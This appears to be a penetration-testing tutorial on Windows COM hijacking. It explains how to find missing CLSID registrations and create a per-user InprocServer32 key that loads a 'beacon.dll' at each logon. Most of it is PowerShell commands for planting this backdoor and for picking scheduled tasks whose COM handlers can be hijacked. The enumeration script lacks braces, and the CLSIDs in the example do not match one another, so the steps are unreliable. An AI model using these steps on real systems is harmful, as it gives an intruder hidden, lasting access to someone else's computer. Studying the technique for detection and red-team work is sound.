COM Hijacking

Searching not existent COM components

As the values of HKCU can be modified by the users COM Hijacking could be used as a persistent mechanisms. Using procmon it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:
  • RegOpenKey operations.
  • where the Result is NAME NOT FOUND.
  • and the Path ends with InprocServer32.
Once you have decided which not existent COM to impersonate execute the following commands. Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill.
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Hijackable Task Scheduler COM components

Windows Tasks actually use Custom Triggers to call COM objects. And because they're executed via the Task Scheduler, it's easier to predict when they're going to be triggered.
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
if ($Task.Actions.ClassId -ne $null)
if ($Task.Triggers.Enabled -eq $true)
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
if ($Task.Principal.GroupId -eq $usersGroup)
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
# Sample Output:
# Task Name: Example
# Task Path: \Microsoft\Windows\Example\
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]
Checking the output you can select one that is going to be executed every time a user logs in for example.
Now searching for the CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} in HKEY_CLASSES_ROOT\CLSID and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\some.dll
ThreadingModel : Both
# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.